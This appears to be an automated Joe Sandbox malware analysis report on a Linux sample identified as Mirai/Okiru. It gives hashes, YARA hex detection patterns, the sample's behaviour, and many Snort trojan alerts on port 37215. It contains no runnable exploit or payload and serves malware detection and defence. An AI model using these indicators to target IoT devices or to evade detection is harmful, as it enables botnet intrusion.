Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
bolonetwork.x86.elf

Overview

General Information

Sample name:bolonetwork.x86.elf
Analysis ID:1470607
MD5:808f3ef3bb55ce80b71edfd7e2fd731c
SHA1:8c6355828eda5701fce4c6c26ddb1b48e2592847
SHA256:7af0472e07a630366f42e1d56cd22455469230058025e99212589daf22693b0e
Infos:

Detection

Mirai, Okiru
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Detected Mirai
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mirai
Yara detected Okiru
Connects to many ports of the same IP (likely port scanning)
Machine Learning detection for sample
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Yara signature match

Classification

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1470607
Start date and time:2024-07-10 08:25:29 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 52s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:bolonetwork.x86.elf
Detection:MAL
Classification:mal100.troj.linELF@0/0@22/0
  • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing network information.
  • VT rate limit hit for: bolonetwork.x86.elf
Command:/tmp/bolonetwork.x86.elf
PID:5518
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:
  • system is lnxubuntu20
  • dash New Fork (PID: 5488, Parent: 3632)
  • rm (PID: 5488, Parent: 3632, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.OoywKx7u03 /tmp/tmp.psVYtsi0OO /tmp/tmp.vhqRrcVLNp
  • dash New Fork (PID: 5489, Parent: 3632)
  • rm (PID: 5489, Parent: 3632, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.OoywKx7u03 /tmp/tmp.psVYtsi0OO /tmp/tmp.vhqRrcVLNp
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
bolonetwork.x86.elfJoeSecurity_OkiruYara detected OkiruJoe Security
    bolonetwork.x86.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
      bolonetwork.x86.elfJoeSecurity_Mirai_3Yara detected MiraiJoe Security
        bolonetwork.x86.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          bolonetwork.x86.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
          • 0x13460:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x13474:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x13488:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1349c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x134b0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x134c4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x134d8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x134ec:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x13500:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x13514:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x13528:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1353c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x13550:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x13564:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x13578:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1358c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x135a0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x135b4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x135c8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x135dc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x135f0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          Click to see the 8 entries
          SourceRuleDescriptionAuthorStrings
          5518.1.0000000008048000.000000000805e000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
            5518.1.0000000008048000.000000000805e000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
              5518.1.0000000008048000.000000000805e000.r-x.sdmpJoeSecurity_Mirai_3Yara detected MiraiJoe Security
                5518.1.0000000008048000.000000000805e000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
                  5518.1.0000000008048000.000000000805e000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
                  • 0x13460:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x13474:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x13488:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x1349c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x134b0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x134c4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x134d8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x134ec:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x13500:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x13514:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x13528:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x1353c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x13550:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x13564:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x13578:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x1358c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x135a0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x135b4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x135c8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x135dc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x135f0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  Click to see the 33 entries
                  Timestamp:07/10/24-08:26:49.804383
                  SID:2835222
                  Source Port:48162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.467612
                  SID:2835222
                  Source Port:57938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.356703
                  SID:2835222
                  Source Port:54312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.453618
                  SID:2835222
                  Source Port:43284
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.228026
                  SID:2829579
                  Source Port:54606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.865668
                  SID:2835222
                  Source Port:47590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.426359
                  SID:2835222
                  Source Port:47396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.234047
                  SID:2835222
                  Source Port:37682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.027319
                  SID:2835222
                  Source Port:44378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.120047
                  SID:2829579
                  Source Port:55746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.660546
                  SID:2835222
                  Source Port:49928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.496514
                  SID:2835222
                  Source Port:41456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.054333
                  SID:2835222
                  Source Port:40534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.953433
                  SID:2829579
                  Source Port:56330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.917570
                  SID:2829579
                  Source Port:59144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.467613
                  SID:2829579
                  Source Port:49936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.637197
                  SID:2829579
                  Source Port:60762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.179798
                  SID:2829579
                  Source Port:33690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.604858
                  SID:2835222
                  Source Port:59308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.201699
                  SID:2829579
                  Source Port:50836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.818070
                  SID:2835222
                  Source Port:40452
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.325101
                  SID:2835222
                  Source Port:46428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.076919
                  SID:2835222
                  Source Port:57234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.298148
                  SID:2829579
                  Source Port:43180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.040867
                  SID:2829579
                  Source Port:35270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.214709
                  SID:2835222
                  Source Port:42376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.485382
                  SID:2835222
                  Source Port:58252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.713533
                  SID:2835222
                  Source Port:40912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.981367
                  SID:2835222
                  Source Port:52180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.796223
                  SID:2835222
                  Source Port:60264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.039425
                  SID:2835222
                  Source Port:51250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.584226
                  SID:2829579
                  Source Port:42312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.084345
                  SID:2835222
                  Source Port:55964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.872361
                  SID:2829579
                  Source Port:51532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.864839
                  SID:2829579
                  Source Port:60614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.758809
                  SID:2835222
                  Source Port:56612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.076000
                  SID:2835222
                  Source Port:51710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.512071
                  SID:2829579
                  Source Port:47666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.995409
                  SID:2829579
                  Source Port:53360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.998271
                  SID:2829579
                  Source Port:43576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.730689
                  SID:2835222
                  Source Port:36120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.456232
                  SID:2835222
                  Source Port:44208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.782504
                  SID:2835222
                  Source Port:32788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.067694
                  SID:2835222
                  Source Port:51834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.222070
                  SID:2835222
                  Source Port:52640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.122842
                  SID:2829579
                  Source Port:52890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.919816
                  SID:2829579
                  Source Port:55980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.592657
                  SID:2835222
                  Source Port:34166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.256446
                  SID:2835222
                  Source Port:33182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.844720
                  SID:2835222
                  Source Port:38680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.353894
                  SID:2835222
                  Source Port:49328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.587829
                  SID:2835222
                  Source Port:45114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.652788
                  SID:2835222
                  Source Port:43322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.780678
                  SID:2835222
                  Source Port:34304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.140303
                  SID:2829579
                  Source Port:45824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.543257
                  SID:2829579
                  Source Port:51872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.532257
                  SID:2835222
                  Source Port:60000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.407706
                  SID:2835222
                  Source Port:52630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.645558
                  SID:2829579
                  Source Port:55372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.949287
                  SID:2829579
                  Source Port:45744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.662602
                  SID:2835222
                  Source Port:48078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.834726
                  SID:2835222
                  Source Port:51090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.603545
                  SID:2829579
                  Source Port:38876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.503122
                  SID:2835222
                  Source Port:51794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.857366
                  SID:2835222
                  Source Port:44054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.644987
                  SID:2829579
                  Source Port:38180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.161125
                  SID:2829579
                  Source Port:45084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.560872
                  SID:2835222
                  Source Port:58186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:21.733368
                  SID:2030490
                  Source Port:46700
                  Destination Port:5976
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.177763
                  SID:2829579
                  Source Port:45656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.691273
                  SID:2829579
                  Source Port:43580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.036040
                  SID:2829579
                  Source Port:39110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.414478
                  SID:2829579
                  Source Port:48800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.654831
                  SID:2829579
                  Source Port:52232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.575207
                  SID:2829579
                  Source Port:53310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.448133
                  SID:2835222
                  Source Port:46464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.249453
                  SID:2829579
                  Source Port:49286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.294907
                  SID:2835222
                  Source Port:51062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.392323
                  SID:2835222
                  Source Port:54510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.548799
                  SID:2835222
                  Source Port:48388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.763901
                  SID:2835222
                  Source Port:47832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.315486
                  SID:2835222
                  Source Port:50676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.339943
                  SID:2835222
                  Source Port:40584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.387027
                  SID:2835222
                  Source Port:33508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.027011
                  SID:2835222
                  Source Port:43174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.489960
                  SID:2829579
                  Source Port:41108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.864771
                  SID:2835222
                  Source Port:58556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.479607
                  SID:2829579
                  Source Port:32874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.398868
                  SID:2835222
                  Source Port:54492
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.198368
                  SID:2829579
                  Source Port:46294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.126116
                  SID:2835222
                  Source Port:32920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.483215
                  SID:2835222
                  Source Port:57270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.648548
                  SID:2829579
                  Source Port:42462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.008169
                  SID:2829579
                  Source Port:37834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.198979
                  SID:2829579
                  Source Port:34148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.999784
                  SID:2829579
                  Source Port:57198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.525899
                  SID:2835222
                  Source Port:40654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.563035
                  SID:2829579
                  Source Port:38920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.832296
                  SID:2835222
                  Source Port:42872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.850354
                  SID:2835222
                  Source Port:60374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.344718
                  SID:2829579
                  Source Port:44942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.854887
                  SID:2835222
                  Source Port:51814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.633265
                  SID:2829579
                  Source Port:40620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.389278
                  SID:2829579
                  Source Port:35626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.410834
                  SID:2829579
                  Source Port:51880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.180916
                  SID:2829579
                  Source Port:58510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:16.996210
                  SID:2829579
                  Source Port:36316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.900792
                  SID:2835222
                  Source Port:43860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.828817
                  SID:2829579
                  Source Port:52098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.533140
                  SID:2835222
                  Source Port:33630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.003273
                  SID:2835222
                  Source Port:53626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.781765
                  SID:2829579
                  Source Port:33734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.980540
                  SID:2835222
                  Source Port:45454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.820799
                  SID:2829579
                  Source Port:38502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.187114
                  SID:2829579
                  Source Port:34766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.653833
                  SID:2829579
                  Source Port:49568
                  Destination Port:37215
                  Protocol:TCP
